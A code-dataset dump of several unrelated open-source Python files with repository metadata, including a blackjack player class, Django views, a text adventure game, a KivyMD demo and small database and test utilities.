] | 1 | 2019-05-04T04:49:17.000Z | 2019-05-04T04:49:17.000Z | Exercises/Blackjack/player.py | Gwarglemar/Python | 3261892dea4d51b320cde2ce8a47e67a67609d30 | [
"MIT"
] | null | null | null | Exercises/Blackjack/player.py | Gwarglemar/Python | 3261892dea4d51b320cde2ce8a47e67a67609d30 | [
"MIT"
] | null | null | null | from person import Person
class Player(Person):
def __init__(self,starting_chips=100):
self.hand = []
self.chips = starting_chips
def show_hand(self):
output = "Player's hand: "
for card in self.hand:
output = output + str(card) + ' | '
print(output)
def remove_chips(self,qty):
if self.chips < qty:
self.chips = 0
else:
self.chips = self.chips - qty
def add_chips(self,qty):
self.chips += qty
def get_chip_total(self):
return self.chips | 23.96 | 48 | 0.534224 | 72 | 599 | 4.291667 | 0.416667 | 0.203884 | 0.116505 | 0.097087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010554 | 0.367279 | 599 | 25 | 49 | 23.96 | 0.804749 | 0 | 0 | 0 | 0 | 0 | 0.03125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.263158 | false | 0 | 0.052632 | 0.052632 | 0.421053 | 0.052632 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
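The chip bookkeeping in Player above clamps the balance at zero when a bet exceeds the stack. A minimal self-contained sketch of that behavior (the Person stand-in below is an assumption, since person.py is not shown):

```python
class Person:
    # minimal stand-in for the base class imported from person.py
    pass

class Player(Person):
    def __init__(self, starting_chips=100):
        self.hand = []
        self.chips = starting_chips

    def remove_chips(self, qty):
        # chips never go negative: the balance is clamped at zero
        self.chips = max(self.chips - qty, 0)

    def add_chips(self, qty):
        self.chips += qty

p = Player(starting_chips=50)
p.remove_chips(80)       # over-betting empties the stack instead of going negative
broke = p.chips
p.add_chips(25)
after_buy_in = p.chips
```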
b3be5e4d32b31ac0089b95f2765e156e2d1976e1 | 1,235 | py | Python | app/owm_forecast/views.py | Valentin-Golyonko/FlaskTestRPi | b9796a9acb2bb1c122301a3ef192f43c857eb27b | [
"Apache-2.0"
] | null | null | null | app/owm_forecast/views.py | Valentin-Golyonko/FlaskTestRPi | b9796a9acb2bb1c122301a3ef192f43c857eb27b | [
"Apache-2.0"
] | null | null | null | app/owm_forecast/views.py | Valentin-Golyonko/FlaskTestRPi | b9796a9acb2bb1c122301a3ef192f43c857eb27b | [
"Apache-2.0"
] | null | null | null | from django.contrib.auth.mixins import LoginRequiredMixin
from rest_framework import status
from rest_framework.generics import GenericAPIView
from rest_framework.permissions import IsAuthenticated
from rest_framework.renderers import TemplateHTMLRenderer
from rest_framework.response import Response
from app.owm_forecast.models import Forecast
from config.settings import LOGOUT_REDIRECT_URL
class ForecastView(LoginRequiredMixin, GenericAPIView):
login_url = LOGOUT_REDIRECT_URL
renderer_classes = [TemplateHTMLRenderer]
template_name = 'forecast/forecast.html'
permission_classes = (IsAuthenticated,)
pagination_class = None
@staticmethod
def get(request, *args, **kwargs):
forecast_obj = Forecast.objects.filter(main_source=True).first()
if forecast_obj:
out_data = {}
if forecast_obj.current_weather_data:
out_data.update(forecast_obj.current_weather_data)
if forecast_obj.current_air_pollution_data:
out_data.update(forecast_obj.current_air_pollution_data)
return Response(data=out_data, status=status.HTTP_200_OK)
else:
return Response(data={}, status=status.HTTP_404_NOT_FOUND)
| 39.83871 | 72 | 0.756275 | 143 | 1,235 | 6.244755 | 0.461538 | 0.073908 | 0.095185 | 0.038074 | 0.179171 | 0.129899 | 0.078387 | 0 | 0 | 0 | 0 | 0.005935 | 0.181377 | 1,235 | 30 | 73 | 41.166667 | 0.877349 | 0 | 0 | 0 | 0 | 0 | 0.017814 | 0.017814 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.307692 | 0 | 0.653846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
b3c50cc00310efefd9a39ed3a9611d6fb57a4cf5 | 11,149 | py | Python | pycode2/ex43.py | v-sukt/misc_code | ac5ea0a55a070c88c410d14511c25d332fc675d5 | [
"Apache-2.0"
] | null | null | null | pycode2/ex43.py | v-sukt/misc_code | ac5ea0a55a070c88c410d14511c25d332fc675d5 | [
"Apache-2.0"
] | null | null | null | pycode2/ex43.py | v-sukt/misc_code | ac5ea0a55a070c88c410d14511c25d332fc675d5 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python2.7
""" Guidelines for Object Oriented Analysis and Design:
1. Write down about the problem
2. Extract key concepts from #1 and research them
3. Create a class hierarchy and object map for the concepts - in object has-a / is-a fashion
4. Code the classes and a test to run them
5. Repeat and refine it
It all works like forming a very abstract idea and then solidifying it further.
Now draw some diagrams depicting the relationship between various things and write description of these things.
- once it's perfect (covers all things needed) separate the nouns and verbs from it (classes/objects and methods).
- ensure that you fully understand it and can visualize it; if not, do some research on them and understand
- get some rough common relations between the nouns and how they can be related to each other, i.e. a basic hierarchy for classes
- check which of these names refer to similar things:
* e.g. the same thing named twice, once for the class and once for an instance of it
* what is basically just another word for another thing?
- create a basic structure and some code - test that it works
- keep on adding some code and testing it's working, repeat and refine
The method used earlier is called the top-down method, where at the top it's just abstract and towards the bottom it gets more solidified.
There is another way, which one can use as one becomes good at programming, when some part of this big puzzle is already known to you
and you can think about the problem in terms of code. Some steps for this way (Bottom Up):
1. Take a small piece of the problem; hack on some code and get it to run barely.
2. Refine the code into something more formal with classes and automated tests.
3. Extract the key concepts you're using and try to find research for them.
4. Write up a description of what's really going on.
5. Go back and refine the code, possibly throwing it out and starting over.
6. Repeat, moving on to some other piece of the problem.
Remember that your solution will probably be meandering and weird, so that's why Zed's version of this process involves going
back and finding research then cleaning things up based on what you've learned.
"""
from sys import exit
from random import randint
class Scene(object):
def enter(self):
print "This scene is not yet configured. Subclass it and implement enter()"
exit(1)
class Engine(object):
def __init__(self, scene_map):
self.scene_map = scene_map
def play(self):
current_scene = self.scene_map.opening_scene()
while True:
print "\n------------"
next_scene_name = current_scene.enter()
current_scene = self.scene_map.next_scene(next_scene_name)
class Death(Scene):
quips = [ "You died. You kinda suck at this.",
"Your mom would be proud...if she were smarter",
"Such a luser.",
"I've a small puppy that's better at this."
]
def enter(self):
print Death.quips[randint(0, len(self.quips)-1)]
exit(1)
class CentralCorridor(Scene):
def enter(self):
print "The Gothons of Planet Percal #25 have invaded your ship and destroyed"
print "your entire crew. You are the last surviving member and your last"
print "mission is to get the neutron destruct bomb from the Weapons Armory,"
print "put it in the bridge, and blow the ship up after getting into an "
print "escape pod.\n"
print "You're running down the central corridor to the Weapons Armory when"
print "a Gothon jumps out, red scaly skin, dark grimy teeth, and evil clown costume"
print "flowing around his hate filled body. He's blocking the door to the"
print "Armory and about to pull a weapon to blast you."
action = raw_input("(shoot!/dodge!/tell a joke)> ")
if action == "shoot!":
print "Quick on the draw you yank out your blaster and fire it at the Gothon."
print "His clown costume is flowing and moving around his body, which throws"
print "off your aim. Your laser hits his costume but misses him entirely. This"
print "completely ruins his brand new costume his mother bought him, which"
print "makes him fly into a rage and blast you repeatedly in the face until"
print "you are dead. Then he eats you."
return 'death'
elif action == "dodge!":
print "Like a world class boxer you dodge, weave, slip and slide right"
print "as the Gothon's blaster cranks a laser past your head."
print "In the middle of your artful dodge your foot slips and you"
print "bang your head on the metal wall and pass out."
print "You wake up shortly after only to die as the Gothon stomps on"
print "your head and eats you."
return 'death'
elif action == "tell a joke":
print "Lucky for you they made you learn Gothon insults in the academy."
print "You tell the one Gothon joke you know:"
print "Lbhe zbgure vf fb sng, jura fur fvgf nebhaq gur ubhfr, fur fvgf nebhaq gur ubhfr."
print "The Gothon stops, tries not to laugh, then busts out laughing and can't move."
print "While he's laughing you run up and shoot him square in the head"
print "putting him down, then jump through the Weapon Armory door."
return 'laser_weapon_armory'
else:
print "DOES NOT COMPUTE!"
return 'central_corridor'
class LaserWeaponArmory(Scene):
def enter(self):
print "You do a dive roll into the Weapon Armory, crouch and scan the room"
print "for more Gothons that might be hiding. It's dead quiet, too quiet."
print "You stand up and run to the far side of the room and find the"
print "neutron bomb in its container. There's a keypad lock on the box"
print "and you need the code to get the bomb out. If you get the code"
print "wrong 10 times then the lock closes forever and you can't"
print "get the bomb. The code is 3 digits."
code = int("%d%d%d" % (randint(1,9), randint(1,9), randint(1,9)))
try: # cheat code - typing anything non-numeric skips the lock
guess = int(raw_input("[keypad]> "))
guesses = 0
while guess != code and guesses < 10:
print "BZZZZEDDD!"
guesses += 1
guess = int(raw_input("[keypad]> ")) # both sides are integers now, so the lock can actually be opened
except ValueError:
guess = code
if guess == code:
print "The container clicks open and the seal breaks, letting gas out."
print "You grab the neutron bomb and run as fast as you can to the"
print "bridge where you must place it in the right spot."
return 'the_bridge'
else:
print "The lock buzzes one last time and then you hear a sickening"
print "melting sound as the mechanism is fused together."
print "You decide to sit there, and finally the Gothons blow up the"
print "ship from their ship and you die."
return 'death'
exit(0)
class TheBridge(Scene):
def enter(self):
print "You burst onto the Bridge with the neutron destruct bomb"
print "under your arm and surprise 5 Gothons who are trying to"
print "take control of the ship. Each of them has an even uglier"
print "clown costume than the last. They haven't pulled their"
print "weapons out yet, as they see the active bomb under your"
print "arm and don't want to set it off."
action = raw_input("(throw the bomb/slowly place the bomb/something else)> ")
if action == "throw the bomb":
print "In a panic you throw the bomb at the group of Gothons"
print "and make a leap for the door. Right as you drop it a"
print "Gothon shoots you right in the back killing you."
print "As you die you see another Gothon frantically try to disarm"
print "the bomb. You die knowing they will probably blow up when"
print "it goes off."
return 'death'
elif action == "slowly place the bomb":
print "You point your blaster at the bomb under your arm"
print "and the Gothons put their hands up and start to sweat."
print "You inch backward to the door, open it, and then carefully"
print "place the bomb on the floor, pointing your blaster at it."
print "You then jump back through the door, punch the close button"
print "and blast the lock so the Gothons can't get out."
print "Now that the bomb is placed you run to the escape pod to"
print "get off this tin can."
return 'escape_pod'
else:
print "DOES NOT COMPUTE!"
return "the_bridge"
class EscapePod(Scene):
def enter(self):
print "You rush through the ship desperately trying to make it to"
print "the escape pod before the whole ship explodes. It seems like"
print "hardly any Gothons are on the ship, so your run is clear of"
print "interference. You get to the chamber with the escape pods, and"
print "now need to pick one to take. Some of them could be damaged"
print "but you don't have time to look. There's 5 pods, which one"
print "do you take?"
good_pod = randint(1,5)
try: # cheat code - typing anything non-numeric picks the good pod
guess = int(raw_input("[pod #]> "))
except ValueError:
guess = good_pod
if guess != good_pod:
print "You jump into pod %s and hit the eject button" % guess
print "The pod escapes out into the void of space, then"
print "implodes as the hull ruptures, crushing your body"
print "into jam jelly."
return 'death'
else:
print "You jump into pod %s and hit the eject button." % guess
print "The pod easily slides out into space heading to"
print "the planet below. As it flies to the planet, you look"
print "back and see your ship implode then explode like a"
print "bright star, taking out the Gothon ship at the same"
print "time. You won!"
return 'finished'
class Map(object):
scenes = {
'central_corridor' : CentralCorridor(),
'laser_weapon_armory' : LaserWeaponArmory(),
'the_bridge' : TheBridge(),
'escape_pod' : EscapePod(),
'death' : Death()
}
def __init__(self, start_scene):
self.start_scene = start_scene
def next_scene(self, scene_name):
return Map.scenes.get(scene_name)
def opening_scene(self):
return self.next_scene(self.start_scene)
a_map = Map("central_corridor")
a_game = Engine(a_map)
a_game.play() | 46.454167 | 135 | 0.647771 | 1,704 | 11,149 | 4.205986 | 0.314554 | 0.016743 | 0.008372 | 0.01186 | 0.096693 | 0.077159 | 0.050509 | 0.050509 | 0.050509 | 0.050509 | 0 | 0.004803 | 0.29034 | 11,149 | 240 | 136 | 46.454167 | 0.901036 | 0.025025 | 0 | 0.130178 | 0 | 0 | 0.546067 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.005917 | 0.011834 | null | null | 0.497041 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
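The Engine/Scene/Map loop above runs until exit() is called from inside a scene. The same dispatch pattern can be sketched as a finite Python 3 loop that stops at a terminal scene; the scene names and classes below are illustrative, not from the game:

```python
class Scene:
    def enter(self):
        raise NotImplementedError

class Start(Scene):
    def enter(self):
        return "finish"          # name of the next scene

class Finish(Scene):
    def enter(self):
        return None              # terminal scene: no successor

class Map:
    scenes = {"start": Start(), "finish": Finish()}

    def __init__(self, start_scene):
        self.start_scene = start_scene

    def next_scene(self, scene_name):
        return Map.scenes.get(scene_name)

def play(a_map):
    """Walk scenes from the start until a scene returns no successor."""
    visited = []
    scene = a_map.next_scene(a_map.start_scene)
    while scene is not None:
        visited.append(type(scene).__name__)
        next_name = scene.enter()
        scene = a_map.next_scene(next_name) if next_name else None
    return visited

order = play(Map("start"))
```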
b3d5c451d19cad58cf067b19b358900f24263b22 | 283 | py | Python | schumt/criterion/__init__.py | Schureed/SchuMT | f4438c26243a6e736a71f376a0e186ba7c01f130 | [
"Unlicense"
] | null | null | null | schumt/criterion/__init__.py | Schureed/SchuMT | f4438c26243a6e736a71f376a0e186ba7c01f130 | [
"Unlicense"
] | null | null | null | schumt/criterion/__init__.py | Schureed/SchuMT | f4438c26243a6e736a71f376a0e186ba7c01f130 | [
"Unlicense"
] | null | null | null | import importlib
import os
import schumt.builder
builder = schumt.builder.Builder()
for _filename in os.listdir(os.path.dirname(__file__)):
if not _filename.endswith('.py') or '__' in _filename:
continue
importlib.import_module(__package__ + '.' + _filename[:-3])
| 23.583333 | 63 | 0.717314 | 35 | 283 | 5.371429 | 0.6 | 0.159574 | 0.212766 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004202 | 0.159011 | 283 | 11 | 64 | 25.727273 | 0.785714 | 0 | 0 | 0 | 0 | 0 | 0.021201 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
b60262f3bc9e43c9ceff274eda24792109e04191 | 1,242 | py | Python | demos/kitchen_sink/studies/shrine/shrine.py | ibrahimcetin/KivyMD | b8b718f24ce8d7dc90b78ea62574e208ef32776a | [
"MIT"
] | 1 | 2020-10-03T04:30:59.000Z | 2020-10-03T04:30:59.000Z | demos/kitchen_sink/studies/shrine/shrine.py | ibrahimcetin/KivyMD | b8b718f24ce8d7dc90b78ea62574e208ef32776a | [
"MIT"
] | null | null | null | demos/kitchen_sink/studies/shrine/shrine.py | ibrahimcetin/KivyMD | b8b718f24ce8d7dc90b78ea62574e208ef32776a | [
"MIT"
] | 1 | 2020-10-19T21:18:43.000Z | 2020-10-19T21:18:43.000Z | """
MDShrine demo
=============
.. seealso::
`Material Design spec, Shrine <https://material.io/design/material-studies/shrine.html#>`
Shrine is a retail app that uses Material Design components
and Material Theming to express branding for a variety of fashion and lifestyle items.
"""
import os
from kivy.lang import Builder
from kivy.properties import StringProperty
from kivy.uix.screenmanager import ScreenManager
from kivymd.theming import ThemableBehavior
Builder.load_string(
"""
#:import FadeTransition kivy.uix.screenmanager.FadeTransition
#:import ShrineRegisterScreen studies.shrine.baseclass.register_screen.ShrineRegisterScreen
#:import ShrineRootScreen studies.shrine.baseclass.shrine_root_screen.ShrineRootScreen
<MDShrine>
transition: FadeTransition()
ShrineRegisterScreen:
title: root.title
ShrineRootScreen:
title: root.title
"""
)
KV_DIR = f"{os.path.dirname(__file__)}/kv"
for kv_file in os.listdir(KV_DIR):
with open(os.path.join(KV_DIR, kv_file), encoding="utf-8") as kv:
Builder.load_string(kv.read())
class MDShrine(ThemableBehavior, ScreenManager):
title = StringProperty("SHRINE")
def __init__(self, **kwargs):
super().__init__(**kwargs)
| 24.84 | 92 | 0.747182 | 148 | 1,242 | 6.121622 | 0.5 | 0.043046 | 0.04415 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00094 | 0.143317 | 1,242 | 49 | 93 | 25.346939 | 0.850564 | 0.227858 | 0 | 0 | 0 | 0 | 0.073874 | 0.054054 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.333333 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
3739e12e57043c6c3a410e59b83e85212fd9c9aa | 240 | py | Python | 6.00.1x/MidTerm Quiz/P6Flatten.py | MErmanProject/My-Projects | ca393b71ea8537f21a28dc6ca1558da27bcaa907 | [
"CC0-1.0"
] | null | null | null | 6.00.1x/MidTerm Quiz/P6Flatten.py | MErmanProject/My-Projects | ca393b71ea8537f21a28dc6ca1558da27bcaa907 | [
"CC0-1.0"
] | null | null | null | 6.00.1x/MidTerm Quiz/P6Flatten.py | MErmanProject/My-Projects | ca393b71ea8537f21a28dc6ca1558da27bcaa907 | [
"CC0-1.0"
] | null | null | null | def flatten(aList):
myList = []
for el in aList:
if isinstance(el, list) or isinstance(el, tuple):
myList.extend(flatten(el))
else:
myList.append(el)
return myList
| 26.666667 | 60 | 0.504167 | 26 | 240 | 4.653846 | 0.615385 | 0.198347 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.4 | 240 | 8 | 61 | 30 | 0.840278 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0 | 0 | 0.25 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
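A quick usage check of flatten, restated in one self-contained block:

```python
def flatten(aList):
    """Recursively flatten arbitrarily nested lists and tuples."""
    myList = []
    for el in aList:
        if isinstance(el, (list, tuple)):
            myList.extend(flatten(el))
        else:
            myList.append(el)
    return myList

flat = flatten([1, [2, (3, 4)], [[5], 6]])
```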
376c345eb31698469708d64bc5b16f95f11dbfbe | 3,033 | py | Python | verified_email_change/views.py | fusionbox/django-verified-email-change | fb4b08eb6d1a419ed73409aa33b39a04779e773a | [
"BSD-2-Clause"
] | 1 | 2019-11-04T20:52:37.000Z | 2019-11-04T20:52:37.000Z | verified_email_change/views.py | fusionbox/django-verified-email-change | fb4b08eb6d1a419ed73409aa33b39a04779e773a | [
"BSD-2-Clause"
] | null | null | null | verified_email_change/views.py | fusionbox/django-verified-email-change | fb4b08eb6d1a419ed73409aa33b39a04779e773a | [
"BSD-2-Clause"
] | 1 | 2017-09-16T03:03:06.000Z | 2017-09-16T03:03:06.000Z | from django.views.generic import FormView, UpdateView
from django.db import transaction
from django.contrib import messages
from django.shortcuts import get_object_or_404
from django.contrib.auth import get_user_model
from django.conf import settings
from django.shortcuts import resolve_url
from django.utils.functional import cached_property
from django.utils.translation import ugettext as _
from decoratormixins.auth import LoginRequiredMixin
from .forms import ChangeEmailForm, ChangeEmailCheckPasswordForm
from .signals import email_changed
from . import initiate_email_change, get_email_change_data
User = get_user_model()
class SuccessUrlMixin(object):
def get_success_url(self):
return resolve_url(settings.LOGIN_REDIRECT_URL)
class ChangeEmailView(LoginRequiredMixin, SuccessUrlMixin, FormView):
form_class = ChangeEmailCheckPasswordForm
template_name = 'verified_email_change/change_email.html'
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
# If we pass self.request.user to the form, the form will update it when calling
# form.is_valid(). This will mess up the signed_data computation in View.form_valid().
# This is why we need a copy of self.request.user:
kwargs['instance'] = User.objects.get(pk=self.request.user.pk)
return kwargs
@transaction.atomic
def form_valid(self, form):
new_email = form.cleaned_data['email']
initiate_email_change(self.request.user, new_email)
messages.success(self.request, _("A confirmation email has been sent to {}.").format(
new_email
))
return super().form_valid(form)
class ChangeEmailConfirmView(SuccessUrlMixin, UpdateView):
template_name = 'verified_email_change/change_email_confirm.html'
form_class = ChangeEmailForm
def get_form_kwargs(self):
kwargs = {
'instance': self.object,
'initial': self.get_initial(),
'prefix': self.get_prefix(),
'data': {'email': self.data['email']},
}
return kwargs
@cached_property
def data(self):
return get_email_change_data(self.kwargs['signed_data'])
def get_object(self):
# Raise a 404 if the user already changed its email address
return get_object_or_404(User, pk=self.data['pk'], email=self.data['old_email'])
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['data'] = self.data
return context
def form_valid(self, form):
email_changed.send(
sender=self,
user=self.object,
new_email=self.data['email'],
old_email=self.data['old_email'],
request=self.request,
)
# TODO: what should be done if request.user != object.user?
messages.success(self.request, _("Your email address has been changed to {}.").format(
self.data['email']
))
return super().form_valid(form)
| 35.267442 | 94 | 0.691065 | 380 | 3,033 | 5.323684 | 0.292105 | 0.044488 | 0.029659 | 0.024716 | 0.136431 | 0.095897 | 0.041522 | 0 | 0 | 0 | 0 | 0.003788 | 0.216617 | 3,033 | 85 | 95 | 35.682353 | 0.847643 | 0.108144 | 0 | 0.15625 | 0 | 0 | 0.097073 | 0.031864 | 0 | 0 | 0 | 0.011765 | 0 | 1 | 0.125 | false | 0.03125 | 0.203125 | 0.046875 | 0.5625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
376f670e1b8f00ad55925305051637b057fa3ff7 | 359 | py | Python | backend/app/db.py | s-bose/offline-password-manager | 85b5478d70bb51c2364d0d207cf66f8a11782623 | [
"MIT"
] | null | null | null | backend/app/db.py | s-bose/offline-password-manager | 85b5478d70bb51c2364d0d207cf66f8a11782623 | [
"MIT"
] | null | null | null | backend/app/db.py | s-bose/offline-password-manager | 85b5478d70bb51c2364d0d207cf66f8a11782623 | [
"MIT"
] | null | null | null | from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from app.core.config import DATABASE_URL
engine = create_engine(DATABASE_URL) # database engine
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
Base = declarative_base() # sqlalchemy Base class
| 35.9 | 75 | 0.835655 | 45 | 359 | 6.533333 | 0.466667 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10585 | 359 | 9 | 76 | 39.888889 | 0.915888 | 0.103064 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.571429 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
3797bf049c28b8a4dcb96d0451d19e810f024303 | 280 | py | Python | setup.py | jallen13/google_auth | 82649e31d9ab30ab8decd2b58f4e319dc2b17ae5 | [
"MIT"
] | null | null | null | setup.py | jallen13/google_auth | 82649e31d9ab30ab8decd2b58f4e319dc2b17ae5 | [
"MIT"
] | null | null | null | setup.py | jallen13/google_auth | 82649e31d9ab30ab8decd2b58f4e319dc2b17ae5 | [
"MIT"
] | null | null | null | from setuptools import setup, find_packages
setup(name='google-api-auth',
version='0.1.0',
description = 'Google APIs authentication',
author = 'John Allen',
url = 'https://github.com/jallen13/google-api-auth.git',
packages = find_packages()
)
| 31.111111 | 62 | 0.65 | 34 | 280 | 5.294118 | 0.735294 | 0.133333 | 0.144444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022624 | 0.210714 | 280 | 8 | 63 | 35 | 0.791855 | 0 | 0 | 0 | 0 | 0 | 0.367857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
37989f1ff5783f7a7a43a7d7de2d3393d35737b5 | 909 | py | Python | src/mapping/database.py | makerere-compute/cropsurveillance | 0d15e98cb92efdd6e19cf7ad840a4fd88e834d6e | [
"CC-BY-3.0"
] | 4 | 2015-01-09T18:47:12.000Z | 2018-11-09T17:29:00.000Z | src/mapping/database.py | makerere-compute/cropsurveillance | 0d15e98cb92efdd6e19cf7ad840a4fd88e834d6e | [
"CC-BY-3.0"
] | null | null | null | src/mapping/database.py | makerere-compute/cropsurveillance | 0d15e98cb92efdd6e19cf7ad840a4fd88e834d6e | [
"CC-BY-3.0"
] | null | null | null | #this script is for saving data to the mysql database
import MySQLdb
#create a connection to the database
conn = MySQLdb.connect (host = "localhost",
user = "root",
passwd = "root",
db = "cropsurveillance")
cursor = conn.cursor ()
cursor.execute ("SELECT VERSION()")
row = cursor.fetchone ()
#print server version
print "server version:", row[0]
#this function saves a tile row to the database
def savetile(zoomlevel,tile_lon_ul,tile_lat_ul,tile_lon_lr,tile_lat_lr,tile_blob):
sql = "INSERT INTO imagetiles (zoom,tile_lon_ul,tile_lat_ul,tile_lon_lr,tile_lat_lr,tile_blob) VALUES (%s,%s,%s,%s,%s,%s)"
cursor.execute(sql, (zoomlevel,tile_lon_ul,tile_lat_ul,tile_lon_lr,tile_lat_lr,tile_blob))
conn.commit() # persist the insert; without a commit the row may be lost when the connection closes
print "inserted"
def closeCursor():
cursor.close()
#close the connection to the database
def closeConnection():
conn.close()
| 37.875 | 126 | 0.684268 | 131 | 909 | 4.541985 | 0.427481 | 0.070588 | 0.020168 | 0.065546 | 0.262185 | 0.252101 | 0.252101 | 0.252101 | 0.252101 | 0.252101 | 0 | 0.001383 | 0.20462 | 909 | 23 | 127 | 39.521739 | 0.821577 | 0.19802 | 0 | 0 | 0 | 0.058824 | 0.256906 | 0.088398 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.058824 | 0.058824 | null | null | 0.117647 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
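One thing worth noting about the MySQLdb script above is the commit step: DB-API connections generally start a transaction implicitly, so an INSERT that is never committed can be lost. The same open / insert / commit / close pattern, sketched with the stdlib sqlite3 module (table and values are illustrative):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cursor = conn.cursor()
cursor.execute("CREATE TABLE imagetiles (zoom INTEGER, lon REAL, lat REAL)")
cursor.execute("INSERT INTO imagetiles VALUES (?, ?, ?)", (12, 32.58, 0.34))
conn.commit()  # without a commit, the insert can be lost when the connection closes
row = cursor.execute("SELECT zoom, lon, lat FROM imagetiles").fetchone()
cursor.close()
conn.close()
```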
37affdcf85d08d1a85b7605e0de7eb84243b2279 | 334 | py | Python | conftest.py | tetsuzawa/dxx-py | 8c63327b8814bdd3499c1696b5a5f0eb9fe7fc76 | [
"MIT"
] | null | null | null | conftest.py | tetsuzawa/dxx-py | 8c63327b8814bdd3499c1696b5a5f0eb9fe7fc76 | [
"MIT"
] | null | null | null | conftest.py | tetsuzawa/dxx-py | 8c63327b8814bdd3499c1696b5a5f0eb9fe7fc76 | [
"MIT"
] | null | null | null | import pytest
import os
import numpy as np
import dxx
@pytest.fixture(scope="module")
def mock_data_file() -> str:
mock_file_name = "mock.DSB"
sampling_freq = 48000
mock_data = np.arange(5 * sampling_freq, dtype=np.int16)
dxx.write(mock_file_name, mock_data)
yield mock_file_name
os.remove(mock_file_name)
